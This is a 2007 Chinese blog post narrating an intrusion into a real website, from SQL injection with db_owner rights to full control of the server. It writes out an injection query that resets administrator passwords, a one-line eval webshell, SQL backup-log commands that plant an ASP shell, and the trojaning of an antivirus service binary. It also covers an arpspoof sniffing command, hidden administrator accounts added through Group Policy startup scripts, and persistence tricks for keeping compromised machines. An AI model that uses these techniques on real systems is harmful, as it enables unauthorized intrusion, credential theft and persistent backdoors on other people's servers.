注册 登录  
 加关注
查看详情
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

我的博客

小猪哥

 
 
 

日志

 
 

db_owner 提权  

2007-02-26 19:04:42|  分类: 黑客技术 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

这一篇文章纯属个人入侵的总结,并没有什么高深之处,第一次写文章,难免有一些错误或者你有什么新思路,请不吝指教!

在百度上搜索ckl inurl:asp,搜索出来的,只要是MSSQL数据库的就一定是db_owner权限以上,起码我还没看到过

public的,db_owner可是对当前连接的数据库拥有一切操作权利,可以执行select,update,delete.create.drop等命令.

在搜索出来的资料,找到一个china级的网站,是db_owner权限,浏览一下网站,发现上面上了一个动网7.1论坛,通过

whois.webhosting.info查询,发现还挂有一个网站,应当是个人主机,通过telnet target 80发现iis5.0的,windows2000的吧!

1,得到webshell

有两个思路.第一个是从网站着手

首先从暴表开始,找了一下发现user这个表示存放的动网的用户表,再暴这个表的字段,顺利找出管理员的用户名和密码,密码是md5加密,到www.xmd5.org是解一下,发现管理员还是有一些安全意识的,不是弱口令.那我们是

db_owner权限,可以update,还害怕什么!直接在注入点www.target.com/list.id=1‘;update [user] set password=’49ba59abbe56e057′ where 其中49ba59abbe56e057是123456的md5加密,现在就把前台管理员的密码改成123456了,又同样方法把后台管理员的密码也改成123456,顺利登陆.好,现在可以利用备份数据库的方法,得到webshell

大家都知道动网7.1不能象以前的老方法进行备份,得到webshell了,备份时会检查是不是mdb文件,如果不是就会出错!可是我们也有对策,建一个表,在字段里插入try{eval(Request.form(’#’)+’’)}catch(e){}冰狐浪子的小马,然后把表改成1.gif(也可以在利用copy的命令)在前台上传后,记下地址,在后台直接备份成a.asp成功,用冰狐的客户端连接成功,再上传一个比较少见的大马.

第二个是思路

直接进行差异备份,这里用到的方法是 swan 最近刚公布的backup log

alter database XXXX set RECOVERY FULL

backup log XXXX to disk = ‘c:\Sammy’ with init

create table cmd (a image)

insert into cmd (a) values (’’)

backup log XXXX to disk = ‘c:\xxx\2.asp’

其中XXXX 是数据库     的多了一个%,是为了容错

应用此法顺利得到一个webshell

那现在当然是找提升权限的漏洞了,考虑的当然serv-u和pcanywhere,在系统服务列表里看到了pcanywhere的痕迹,在地址栏输入C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 顺利得到一个.cif文件,用pcanywhere passview得到用户名跟密码,用pcanywhere登陆发现要求只能administrators组才能登陆,那好现在的思路就是找个自启动的服务程序,在系统服务列表里找到了一个瑞星,路径D:\PROGRAM FILES\RISING\RAV下载rising.exe下来后,再捆绑了一个加用户的vbs,再把目标的rising.exe改一下名,再把捆绑好的rising.exe上传上去.就等待服务器的重启了.我可是很有耐心的.提权的方法是多种多样的,自己看着办吧

2.外网的安全

最近看了很多篇的ARP欺骗文章,所以就试验一下.首先ping www.target.com得到IP1.1.1.2,通过portready扫描1.1.1.0-1.1.1.255,通过以前很流行的ms05039,顺利得到一个机子1.1.1.3,并开了3389,进去后直接下载winpcap驱动(嗅探器依赖的驱动),再下载一个arpspoof(嗅探器),然后tracert 发现网关是1.1.1.1.我自己讲一下ARP欺骗的原理,ARP就是地址解析协议,是OSI的网络层(IP层)转为数据链路层(MAC)的协议,在LAN中通信并不是以IP作为地址,而是物理地址,也就是MAC.那我们变可以进行邪恶的欺骗行为,比如有3台主机,A.B.C,A是你的机子,B是你想欺骗

的主机,C是网关,那我们可以发送一个ARP应答给C,说我是B,给C我的MAC地址,再欺骗B,我是网关,并给他我的MAC

地址,他们就会误会,并把所有给B的数据都流向给A.应此A的CPU也就会负荷,可能导致死机.

个人认为防护方法,主动的方法是把MAC和IP固态绑定

ARPSPOOF就是这样的工具.命令格式ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]

在1.1.1.3上运行arpspoof 1.1.1.1 1.1.12 1.1.1.3 21 c:\log.txt

现在就是等待管理员的登陆了

3.固守肉鸡

辛苦得到了肉鸡当然要好好保护了,我们可以利用文件夹的创建漏洞,比如有一个文件夹A 那么我们在cmd下,转

到当前路径,输入mkdir a..\这样就创建了一个文件夹a..\,而当打开这个文件的时候却指向A文件夹,那么我们可以防一个ASP木马在里面,再使用netbox指向这个文件,这个ASP木马就是SYSTEM的权限了.当我们访问www.target.com/a..\/asp木马 这样就可以了.同样的我们也可以利用IIS5.0的漏洞,创建一个虚绿目录A,在这个虚绿目录中又在创建一个虚绿目录B,并指定文件地址,并把IIS的保护挑低,再把我们的第一个虚绿目录A删掉,这样我们访问的时候,www.target.com/a/b/asp木马.同样也拥有SYSTEM的权限.那我们为了以防万一,可以利用此法

net user jouanc$ 123456 /add

net localgroup administrators jouanc$ /add保存为1.vbs,并放在C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup \该目录

net user jouanc$ /del保存为2.vbs,并放在C:\winnt\system32\GroupPolicy\Machine\Scripts\Shutdown\

将以下保存为script.ini,并放在C:\winnt\system32\GroupPolicy\Machine\Scripts

[Startup]

0CmdLine=1.vbs

0Parameters=

[Shutdown]

0CmdLine=2.vbs

0Parameters=

我还有一个想法,就是建个”从网上下载东东的vbs”相当与downloader,从我们自己的空间下载我们配置好的后门

然后用个bat,利用if来判断是否把我们的后门下载下来,然后再goto运行它,把这两个绑好后,放在startup里.

在shutdown里,放一个del “我们的木马”的bat,前提ie可以打开,我进过一些肉鸡,要打开ie,必须设置的.

还有一招,大家在cmd下输入set

其中有两行

Path=D:\WINNT\system32;D:\WINNT;D:\WINNT\System32\Wbem

PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH

知道吧,.com最有优先权,那我们可以放一个www.google.com,注意”www.google.com”是我们的木马,我们把它放在

D:\WINNT\system32,哈哈,当肉鸡打开ie,输入www.google.com的话,ie只会先找我们的木马

除非他输入的是”http://www.google.com”

其实保护肉鸡的方法有很多,我很喜欢这种保护肉鸡的方法,不会被杀,又能抓牢肉鸡

  评论这张
 
阅读(138)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018